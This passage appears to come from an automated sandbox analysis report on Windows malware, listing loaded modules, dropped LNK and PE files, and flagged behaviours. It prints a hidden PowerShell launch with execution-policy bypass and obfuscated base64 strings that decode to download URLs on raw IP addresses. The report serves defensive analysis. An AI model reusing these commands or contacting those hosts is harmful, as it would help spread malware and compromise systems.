Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: jli.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: jli.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: version.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: wldp.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: propsys.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: profapi.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: edputil.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: netutils.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: slc.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: userenv.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: sppc.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\shutdown.exe Section loaded: shutdownext.dll Jump to behavior
Source: C:\Windows\System32\shutdown.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\shutdown.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32 Jump to behavior
Source: _kjfech8_V.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\Public\computer_kjfech8_V.cmd
Source: _kjfech8_VEX.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\_kjfech8_V\_kjfech8_V.exe
Source: _kjfech8_VAT.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\_kjfech8_V\_kjfech8_V.exe
Source: _kjfech8_VAA.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\_kjfech8_V\_kjfech8_Vi7.exe
Source: _kjfech8_Vy.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\Public\computer_kjfech8_Vy.cmd
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe File opened: C:\_kjfech8_V\MSVCR100.dll Jump to behavior
Source: Binary string: msvcr100.i386.pdb source: _kjfech8_Vi7.exe, _kjfech8_Vi7.exe, 0000000B.00000002.29808351670.000000006FD71000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30385075264.0000014C514D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb> source: powershell.exe, 00000014.00000002.30388421204.0000014C517A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u92\6642\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: _kjfech8_Vi7.exe, 00000009.00000000.29777323121.0000000000D02000.00000002.00000001.01000000.00000008.sdmp, _kjfech8_Vi7.exe, 0000000B.00000000.29782413626.0000000000D02000.00000002.00000001.01000000.00000008.sdmp, _kjfech8_Vi7.exe, 0000000B.00000002.29804465764.0000000000D02000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000014.00000002.30385075264.0000014C514D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30388421204.0000014C517A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30388421204.0000014C51760000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000014.00000002.30390098625.0000014C517D6000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('aAB0AHQAcAA6AC8ALwA2ADIALgA3ADIALgAzAC4AMgAxADAALwBsAGQAaAB0AC8AaQBuAGQAZQB4AC4AcABoAHAA')))) $GlobalListStr = [
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('aAB0AHQAcAA6AC8ALwA4ADYALgAzADgALgAyADEANwAuADEANgA3AC8AcABzADEALwBpAG4AZABlAHgALgBwAGgAcAA=')))) $GlobalListStr
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1" Jump to behavior
Binary contains a suspicious time stamp
Source: fodhelper.exe.4.dr Static PE information: 0xF07D2A93 [Fri Nov 8 07:38:59 2097 UTC]
Contains functionality to dynamically determine API calls
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDFB67F _encoded_null,LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 9_2_6FDFB67F
PE file contains sections with non-standard names
Source: fodhelper.exe.4.dr Static PE information: section name: .imrsiv
Source: jli.dll.4.dr Static PE information: section name: .didata
Source: jli.dll.4.dr Static PE information: section name: .debug
Source: WebView2Loader.txt.4.dr Static PE information: section name: .00cfg
Source: WebView2Loader.txt.4.dr Static PE information: section name: .voltbl
Uses code obfuscation techniques (call, push, ret)
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_00D01695 push ecx; ret 9_2_00D016A8
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD72D80 push eax; ret 9_2_6FD72D9E
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD80995 push ecx; ret 9_2_6FD809A8
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD9A6AA push EF3FEFD4h; iretd 9_2_6FD9A6B1
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD8BF60 push ecx; ret 9_2_6FD8BF73
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD99CD8 pushad ; iretd 9_2_6FD99CE6
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_00D01695 push ecx; ret 11_2_00D016A8
